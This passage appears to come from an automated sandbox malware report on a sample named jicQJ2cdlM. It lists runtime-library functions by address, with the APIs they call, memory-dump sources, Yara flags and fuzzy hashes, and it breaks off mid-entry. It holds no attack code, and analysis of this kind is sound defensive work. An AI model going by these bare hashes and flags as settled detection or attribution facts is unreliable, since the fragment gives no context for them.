                                                                                      • Part of subcall function 009F2B36: ___crtGetTimeFormatEx.LIBCMT ref: 009F2B4C
                                                                                      • Part of subcall function 009F2B36: Concurrency::details::ReferenceLoadLibrary.LIBCONCRT ref: 009F2B6B
                                                                                    • GetLastError.KERNEL32 ref: 009F37C8
                                                                                    • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 009F37DE
                                                                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 009F37EC
                                                                                      • Part of subcall function 009F290C: SetThreadPriority.KERNEL32(?,?), ref: 009F2918
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.4174782860.00000000009E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009E0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_9e0000_jicQJ2cdlM.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Concurrency::details::LibraryLoadThread$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorCreateErrorException@8FormatLastPriorityReferenceThrowTime___crt
                                                                                    • String ID:
                                                                                    • API String ID: 1674182817-0
                                                                                    • Opcode ID: 93dc6e6853861ab66bbf85d3994f28224c3287503f93e908fd108eb425b3b23d
                                                                                    • Instruction ID: 125f10a46583aa5d637da35407b45095e79b75e1bff49ad5788751d90d2472dc
                                                                                    • Opcode Fuzzy Hash: 93dc6e6853861ab66bbf85d3994f28224c3287503f93e908fd108eb425b3b23d
                                                                                    • Instruction Fuzzy Hash: 81F0A7B264031D3AE720B7755D07FBB369C9B41751F50481BBA45E70C2ED98D80487B8
                                                                                    Function 009FD094 Relevance: 6.0, APIs: 4, Instructions: 35threadCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • Concurrency::details::SchedulerProxy::GetCurrentThreadExecutionResource.LIBCMT ref: 009FD0A8
                                                                                    • Concurrency::details::ResourceManager::RemoveExecutionResource.LIBCONCRT ref: 009FD0CC
                                                                                    • std::invalid_argument::invalid_argument.LIBCONCRT ref: 009FD0DF
                                                                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 009FD0ED
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.4174782860.00000000009E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009E0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_9e0000_jicQJ2cdlM.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Resource$Concurrency::details::Execution$CurrentException@8Manager::Proxy::RemoveSchedulerThreadThrowstd::invalid_argument::invalid_argument
                                                                                    • String ID:
                                                                                    • API String ID: 3657713681-0
                                                                                    • Opcode ID: 9390b3195b713983fe10ad4c3c6d405898b6246382bfd66b9966ffe9dd40d037
                                                                                    • Instruction ID: 020ed4b94e5a05bf297f1b7c93ee93d91d2a2a0ac28471a5996c791644c3f2f7
                                                                                    • Opcode Fuzzy Hash: 9390b3195b713983fe10ad4c3c6d405898b6246382bfd66b9966ffe9dd40d037
                                                                                    • Instruction Fuzzy Hash: C4F0593150120C63C724EB11D842DBDB37E8ED0B14728841AEB0653182DF35AE0AC355
                                                                                    Function 00412611 Relevance: 6.0, APIs: 4, Instructions: 29registryCOMMONLIBRARYCODE
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • RegisterWaitForSingleObject.KERNEL32(?,00000000,004235B2,000000A4,000000FF,0000000C), ref: 00412628
                                                                                    • GetLastError.KERNEL32(?,?,?,?,004185E9,?,?,?,?,00000000,?,00000000), ref: 00412637
                                                                                    • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 0041264D
                                                                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 0041265B
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.4174326271.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_jicQJ2cdlM.jbxd
                                                                                    Similarity
                                                                                    • API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastObjectRegisterSingleThrowWait
                                                                                    • String ID:
                                                                                    • API String ID: 3803302727-0
                                                                                    • Opcode ID: e4f9fab13c1926d2e81b23feee93bab4e40d19f09818ad509d0e3559ff61ead6
                                                                                    • Instruction ID: 0dfe4b91b17fca29e91fbe1ee06f4a4a2df34707d6a261af2a3e5670f24271a8
                                                                                    • Opcode Fuzzy Hash: e4f9fab13c1926d2e81b23feee93bab4e40d19f09818ad509d0e3559ff61ead6
                                                                                    • Instruction Fuzzy Hash: 34F0A07460010EBBCF10EFA5DE45EEF37686B00705F600656B514E20E1DA78DA149768
                                                                                    Function 009F2878 Relevance: 6.0, APIs: 4, Instructions: 29registryCOMMONLIBRARYCODE
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • RegisterWaitForSingleObject.KERNEL32(?,00000000,004235B2,000000A4,000000FF,0000000C), ref: 009F288F
                                                                                    • GetLastError.KERNEL32(?,?,?,?,009F8850,?,?,?,?,00000000,?,00000000), ref: 009F289E
                                                                                    • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 009F28B4
                                                                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 009F28C2
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.4174782860.00000000009E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009E0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_9e0000_jicQJ2cdlM.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastObjectRegisterSingleThrowWait
                                                                                    • String ID:
                                                                                    • API String ID: 3803302727-0
                                                                                    • Opcode ID: e4f9fab13c1926d2e81b23feee93bab4e40d19f09818ad509d0e3559ff61ead6
                                                                                    • Instruction ID: e1c4a9bf01560cd57d9cc1033206278cf35adea2a0cc3ac62686f59dabc5acf0
                                                                                    • Opcode Fuzzy Hash: e4f9fab13c1926d2e81b23feee93bab4e40d19f09818ad509d0e3559ff61ead6
                                                                                    • Instruction Fuzzy Hash: B3F0303550020EBBDF10EFA4DD45FAF376C6B00B51F600655B615E60E1DA75DA0497A8
                                                                                    Function 009E5A8C Relevance: 6.0, APIs: 4, Instructions: 29COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • std::_Cnd_initX.LIBCPMT ref: 009E5AA8
                                                                                    • __Cnd_signal.LIBCPMT ref: 009E5AB4
                                                                                    • std::_Cnd_initX.LIBCPMT ref: 009E5AC9
                                                                                    • __Cnd_do_broadcast_at_thread_exit.LIBCPMT ref: 009E5AD0
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.4174782860.00000000009E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009E0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_9e0000_jicQJ2cdlM.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Cnd_initstd::_$Cnd_do_broadcast_at_thread_exitCnd_signal
                                                                                    • String ID:
                                                                                    • API String ID: 2059591211-0
                                                                                    • Opcode ID: 16e91ae191353f76377487b504f8ad98fae09f0c97f906459e9bfe3258fa4ce0
                                                                                    • Instruction ID: 85b0a7a6662fe738999840b5de9aa8de03c7957495624d3587c173bab47260b3
                                                                                    • Opcode Fuzzy Hash: 16e91ae191353f76377487b504f8ad98fae09f0c97f906459e9bfe3258fa4ce0
                                                                                    • Instruction Fuzzy Hash: A4F0A032000B81ABEB327B22C81776A73A4AFC0325F184529F196665A2CFBAAC449751
                                                                                    Function 00412336 Relevance: 6.0, APIs: 4, Instructions: 28COMMONLIBRARYCODE
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • ___crtCreateEventExW.LIBCPMT ref: 0041234C
                                                                                    • GetLastError.KERNEL32(?,?,?,?,?,00410B59), ref: 0041235A
                                                                                    • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 00412370
                                                                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 0041237E
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.4174326271.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_jicQJ2cdlM.jbxd
                                                                                    Similarity
                                                                                    • API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorCreateErrorEventException@8LastThrow___crt
                                                                                    • String ID:
                                                                                    • API String ID: 200240550-0
                                                                                    • Opcode ID: 8f1a4222a24bf13f64463e6bb6d09cdc0fcbd04c53ea7d81c6ce3fbd118b929d
                                                                                    • Instruction ID: f5537a877189a90aa28975f9b1b11099a3717870695f97e2c6136de35ce4b3b1
                                                                                    • Opcode Fuzzy Hash: 8f1a4222a24bf13f64463e6bb6d09cdc0fcbd04c53ea7d81c6ce3fbd118b929d
                                                                                    • Instruction Fuzzy Hash: ADE0D871A0021E29E720B7768D07FBF369C6B00B45F54086BBD14E11C3FDACD61041AC
                                                                                    Function 009F259D Relevance: 6.0, APIs: 4, Instructions: 28COMMONLIBRARYCODE
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • ___crtCreateEventExW.LIBCPMT ref: 009F25B3
                                                                                    • GetLastError.KERNEL32(?,?,?,?,?,009F0DC0), ref: 009F25C1
                                                                                    • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 009F25D7
                                                                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 009F25E5
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.4174782860.00000000009E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009E0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_9e0000_jicQJ2cdlM.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorCreateErrorEventException@8LastThrow___crt
                                                                                    • String ID:
                                                                                    • API String ID: 200240550-0
                                                                                    • Opcode ID: 8f1a4222a24bf13f64463e6bb6d09cdc0fcbd04c53ea7d81c6ce3fbd118b929d
                                                                                    • Instruction ID: caffca07cb084333ceb02cde8708e81928472853235d512f994b01de45a8fa1e
                                                                                    • Opcode Fuzzy Hash: 8f1a4222a24bf13f64463e6bb6d09cdc0fcbd04c53ea7d81c6ce3fbd118b929d
                                                                                    • Instruction Fuzzy Hash: 91E0DF61A4431D2AEB10B7B58C13F7F369C9B00B42F940866FA58E10C3FDA8D90442A8
                                                                                    Function 004192E9 Relevance: 6.0, APIs: 4, Instructions: 26memoryCOMMONLIBRARYCODE
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 00412712: TlsAlloc.KERNEL32(?,00410B59), ref: 00412718
                                                                                    • TlsAlloc.KERNEL32(?,00410B59), ref: 0042399F
                                                                                    • GetLastError.KERNEL32 ref: 004239B1
                                                                                    • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 004239C7
                                                                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 004239D5
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.4174326271.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_jicQJ2cdlM.jbxd
                                                                                    Similarity
                                                                                    • API ID: Alloc$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastThrow
                                                                                    • String ID:
                                                                                    • API String ID: 3735082963-0
                                                                                    • Opcode ID: 90a75019d660bb7e4688d3e898997b6e923421556ddb8c6bd1ae311c324a1122
                                                                                    • Instruction ID: 6dd5cecd5731d0fd3396096e4a73a475127880a88571f9a1564212530dcc10d0
                                                                                    • Opcode Fuzzy Hash: 90a75019d660bb7e4688d3e898997b6e923421556ddb8c6bd1ae311c324a1122
                                                                                    • Instruction Fuzzy Hash: C9E02BF45003245EC310BF72AD4A66F3274790170AB600E2BF015D2192EEBCD1844A9C
                                                                                    Function 009F9550 Relevance: 6.0, APIs: 4, Instructions: 26memoryCOMMONLIBRARYCODE
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 009F2979: TlsAlloc.KERNEL32(?,009F0DC0), ref: 009F297F
                                                                                    • TlsAlloc.KERNEL32(?,009F0DC0), ref: 00A03C06
                                                                                    • GetLastError.KERNEL32 ref: 00A03C18
                                                                                    • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 00A03C2E
                                                                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 00A03C3C
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.4174782860.00000000009E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009E0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_9e0000_jicQJ2cdlM.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Alloc$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastThrow
                                                                                    • String ID:
                                                                                    • API String ID: 3735082963-0
                                                                                    • Opcode ID: 90a75019d660bb7e4688d3e898997b6e923421556ddb8c6bd1ae311c324a1122
                                                                                    • Instruction ID: 67904c61615c6de3243004f54cf70ec0236a5a7cd4b06a30a9fc6daf9da67272
                                                                                    • Opcode Fuzzy Hash: 90a75019d660bb7e4688d3e898997b6e923421556ddb8c6bd1ae311c324a1122
                                                                                    • Instruction Fuzzy Hash: 70E0D17440031DAFD700BB757D4677E366C66017417604E26F655D30E2ED34D24D475D
                                                                                    Function 0041254D Relevance: 6.0, APIs: 4, Instructions: 24COMMONLIBRARYCODE
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetNumaHighestNodeNumber.KERNEL32(?,00000000,?,00410B59,?,?,?,00000000), ref: 00412557
                                                                                    • GetLastError.KERNEL32(?,?,?,00000000), ref: 00412566
                                                                                    • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 0041257C
                                                                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 0041258A
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.4174326271.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_jicQJ2cdlM.jbxd
                                                                                    Similarity
                                                                                    • API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8HighestLastNodeNumaNumberThrow
                                                                                    • String ID:
                                                                                    • API String ID: 3016159387-0
                                                                                    • Opcode ID: 90c6f96075c9eb6d4a06c4afc3ce6f74b9e2c23d697b5ba2851b3fb9f8cfd27c
                                                                                    • Instruction ID: 951ac86653187ea2db5183bbef748415e33b6f8be8890effbe132357fd44ea8b
                                                                                    • Opcode Fuzzy Hash: 90c6f96075c9eb6d4a06c4afc3ce6f74b9e2c23d697b5ba2851b3fb9f8cfd27c
                                                                                    • Instruction Fuzzy Hash: 69E04874A0010DABC714EFB5DF49AEF73BC7A00A45FA00466A501E2151EA6CDB04977D
                                                                                    Function 009F27B4 Relevance: 6.0, APIs: 4, Instructions: 24COMMONLIBRARYCODE
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetNumaHighestNodeNumber.KERNEL32(?,00000000,?,009F0DC0,?,?,?,00000000), ref: 009F27BE
                                                                                    • GetLastError.KERNEL32(?,?,?,00000000), ref: 009F27CD
                                                                                    • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 009F27E3
                                                                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 009F27F1
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.4174782860.00000000009E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009E0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_9e0000_jicQJ2cdlM.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8HighestLastNodeNumaNumberThrow
                                                                                    • String ID:
                                                                                    • API String ID: 3016159387-0
                                                                                    • Opcode ID: 90c6f96075c9eb6d4a06c4afc3ce6f74b9e2c23d697b5ba2851b3fb9f8cfd27c
                                                                                    • Instruction ID: 5d6a68adaca8d20b7efdbaccc1729b1f48d52064e5429fb4e6911ece5e99024f
                                                                                    • Opcode Fuzzy Hash: 90c6f96075c9eb6d4a06c4afc3ce6f74b9e2c23d697b5ba2851b3fb9f8cfd27c
                                                                                    • Instruction Fuzzy Hash: 6EE0807460020DA7C700FBF5DD45FBF73BC6A00B45B600465B645E3051DB68EB088779
                                                                                    Function 004126A5 Relevance: 6.0, APIs: 4, Instructions: 23threadCOMMONLIBRARYCODE
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • SetThreadPriority.KERNEL32(?,?), ref: 004126B1
                                                                                    • GetLastError.KERNEL32 ref: 004126BD
                                                                                    • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 004126D3
                                                                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 004126E1
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.4174326271.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_jicQJ2cdlM.jbxd
                                                                                    Similarity
                                                                                    • API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastPriorityThreadThrow
                                                                                    • String ID:
                                                                                    • API String ID: 4286982218-0
                                                                                    • Opcode ID: a89e8ca6049c9b6ec2fd05d368a3b84ec4fd3d7342a975297e58808702deda3e
                                                                                    • Instruction ID: d6ad487b4c18070c6cf6a1f44c15ecb3f6d05e9c3d6252d545de6a15e1df0045
                                                                                    • Opcode Fuzzy Hash: a89e8ca6049c9b6ec2fd05d368a3b84ec4fd3d7342a975297e58808702deda3e
                                                                                    • Instruction Fuzzy Hash: BBE086746001196BCB24BF61DE06BFF376C7B00745F50082BB515D50A1EF7DD56486AC
                                                                                    Function 0041276B Relevance: 6.0, APIs: 4, Instructions: 23COMMONLIBRARYCODE
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • TlsSetValue.KERNEL32(?,00000000,00417991,00000000,?,?,00410B59,?,?,?,00000000,?,00000000), ref: 00412777
                                                                                    • GetLastError.KERNEL32(?,?,?,00000000,?,00000000), ref: 00412783
                                                                                    • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 00412799
                                                                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 004127A7
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.4174326271.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_jicQJ2cdlM.jbxd
                                                                                    Similarity
                                                                                    • API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastThrowValue
                                                                                    • String ID:
                                                                                    • API String ID: 1964976909-0
                                                                                    • Opcode ID: aac3effd464d41b8a5b5f51f1256ba0c29368646bc02732cdbcc67f1fe2b72fc
                                                                                    • Instruction ID: 402fe0f5bbe0f151a29ab6283833ac733f3ad497baf8671b47c41dc8f6c9e06d
                                                                                    • Opcode Fuzzy Hash: aac3effd464d41b8a5b5f51f1256ba0c29368646bc02732cdbcc67f1fe2b72fc
                                                                                    • Instruction Fuzzy Hash: F7E086746001196BDB20BF65DE09BFF37AC7F00745F50082AB515D50A1EE7DD564869C
                                                                                    Function 009F29D2 Relevance: 6.0, APIs: 4, Instructions: 23COMMONLIBRARYCODE
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • TlsSetValue.KERNEL32(?,00000000,009F7BF8,00000000,?,?,009F0DC0,?,?,?,00000000,?,00000000), ref: 009F29DE
                                                                                    • GetLastError.KERNEL32(?,?,?,00000000,?,00000000), ref: 009F29EA
                                                                                    • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 009F2A00
                                                                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 009F2A0E
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.4174782860.00000000009E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009E0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_9e0000_jicQJ2cdlM.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastThrowValue
                                                                                    • String ID:
                                                                                    • API String ID: 1964976909-0
                                                                                    • Opcode ID: aac3effd464d41b8a5b5f51f1256ba0c29368646bc02732cdbcc67f1fe2b72fc
                                                                                    • Instruction ID: 36d0ed3134a605c8193d11baa2772e88cf95f7902765874442f422e26f1dd513
                                                                                    • Opcode Fuzzy Hash: aac3effd464d41b8a5b5f51f1256ba0c29368646bc02732cdbcc67f1fe2b72fc
                                                                                    • Instruction Fuzzy Hash: 68E0863410011D67DB10BF64DD0ABBF376C6F00741F504925BA59D60A1DE79D55497AC
                                                                                    Function 009F290C Relevance: 6.0, APIs: 4, Instructions: 23threadCOMMONLIBRARYCODE
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • SetThreadPriority.KERNEL32(?,?), ref: 009F2918
                                                                                    • GetLastError.KERNEL32 ref: 009F2924
                                                                                    • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 009F293A
                                                                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 009F2948
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.4174782860.00000000009E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009E0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_9e0000_jicQJ2cdlM.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastPriorityThreadThrow
                                                                                    • String ID:
                                                                                    • API String ID: 4286982218-0
                                                                                    • Opcode ID: a89e8ca6049c9b6ec2fd05d368a3b84ec4fd3d7342a975297e58808702deda3e
                                                                                    • Instruction ID: 08e2ccd7e5129823c8929f3dcea86d767dfbcdbd460bc8a505e1364d2fadd724
                                                                                    • Opcode Fuzzy Hash: a89e8ca6049c9b6ec2fd05d368a3b84ec4fd3d7342a975297e58808702deda3e
                                                                                    • Instruction Fuzzy Hash: CBE0863410011D67DB14BF60DD06BBF37AC6B00741F504825B659D20A1EE79D504875C
                                                                                    Function 00412712 Relevance: 6.0, APIs: 4, Instructions: 21memoryCOMMONLIBRARYCODE
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • TlsAlloc.KERNEL32(?,00410B59), ref: 00412718
                                                                                    • GetLastError.KERNEL32 ref: 00412725
                                                                                    • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 0041273B
                                                                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 00412749
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.4174326271.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_jicQJ2cdlM.jbxd
                                                                                    Similarity
                                                                                    • API ID: AllocConcurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastThrow
                                                                                    • String ID:
                                                                                    • API String ID: 3103352999-0
                                                                                    • Opcode ID: ee2646b63a6430665b3080167d3f8e46aee4a193fb16d21d2dbfdc4c253f15bc
                                                                                    • Instruction ID: 41d26ccb9910f396398e3bce7d3f30876e3ac6ee5b10193dd838f65c512c27a9
                                                                                    • Opcode Fuzzy Hash: ee2646b63a6430665b3080167d3f8e46aee4a193fb16d21d2dbfdc4c253f15bc
                                                                                    • Instruction Fuzzy Hash: F8E0C274500119678728BB759E0AABF73687A01759BA00A6BF031D20E1EEACD45842AC
                                                                                    Function 009F2979 Relevance: 6.0, APIs: 4, Instructions: 21memoryCOMMONLIBRARYCODE
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • TlsAlloc.KERNEL32(?,009F0DC0), ref: 009F297F
                                                                                    • GetLastError.KERNEL32 ref: 009F298C
                                                                                    • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 009F29A2
                                                                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 009F29B0
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.4174782860.00000000009E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009E0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_9e0000_jicQJ2cdlM.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: AllocConcurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastThrow
                                                                                    • String ID:
                                                                                    • API String ID: 3103352999-0
                                                                                    • Opcode ID: ee2646b63a6430665b3080167d3f8e46aee4a193fb16d21d2dbfdc4c253f15bc
                                                                                    • Instruction ID: ee8ee21a267e4d7920fd1a7d3f6d5998eb78b1addff8ecb8c75618fb846d3ec3
                                                                                    • Opcode Fuzzy Hash: ee2646b63a6430665b3080167d3f8e46aee4a193fb16d21d2dbfdc4c253f15bc
                                                                                    • Instruction Fuzzy Hash: 6CE02B3000011D67C714BBB49D4ABBF736C6B01762FA40F26F2A5D30E1EEA8D40843AC
                                                                                    Function 0042F09D Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 189COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • __startOneArgErrorHandling.LIBCMT ref: 0042F12D
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.4174326271.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_jicQJ2cdlM.jbxd
                                                                                    Similarity
                                                                                    • API ID: ErrorHandling__start
                                                                                    • String ID: pow
                                                                                    • API String ID: 3213639722-2276729525
                                                                                    • Opcode ID: cb57d0990ecd4e157a276670056fa63ecf5c6ef3cb6d4436f05d56c4fa4236c6
                                                                                    • Instruction ID: ab4d94818e4fdfc694d7abd88a5ac0d422e49d456205366947d10b0b41845edd
                                                                                    • Opcode Fuzzy Hash: cb57d0990ecd4e157a276670056fa63ecf5c6ef3cb6d4436f05d56c4fa4236c6
                                                                                    • Instruction Fuzzy Hash: CA518D61B04202D6CB117714E90137BABB0EB54B10FE4597FF491463A9EE2E8CA99A4F
                                                                                    Function 0043AE89 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 88COMMONLIBRARYCODE
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetACP.KERNEL32(?,20001004,?,00000002,00000000,00000050,00000050,?,0043B0E4,?,00000050,?,?,?,?,?), ref: 0043AF64
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.4174326271.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_jicQJ2cdlM.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: ACP$OCP
                                                                                    • API String ID: 0-711371036
                                                                                    • Opcode ID: 3d3d09a8c43a337bc5f8b6bf8185eed6c30071c5532ceeb821c98544ef4eef7c
                                                                                    • Instruction ID: 994420f7c07a265647d1fb29ceaf4862ceaaa8a779cd6f75aafce353e6124497
                                                                                    • Opcode Fuzzy Hash: 3d3d09a8c43a337bc5f8b6bf8185eed6c30071c5532ceeb821c98544ef4eef7c
                                                                                    • Instruction Fuzzy Hash: 122108A2BC0101A6EB30DB14C90279B7266EF6CB10F569527E98AD7340E73ADD11C35E
                                                                                    Function 00A1B0F0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 88COMMONLIBRARYCODE
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetACP.KERNEL32(?,20001004,?,00000002,00000000,00000050,00000050,?,00A1B34B,?,00000050,?,?,?,?,?), ref: 00A1B1CB
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.4174782860.00000000009E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009E0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_9e0000_jicQJ2cdlM.jbxd
                                                                                    Yara matches
                                                                                    Similarity
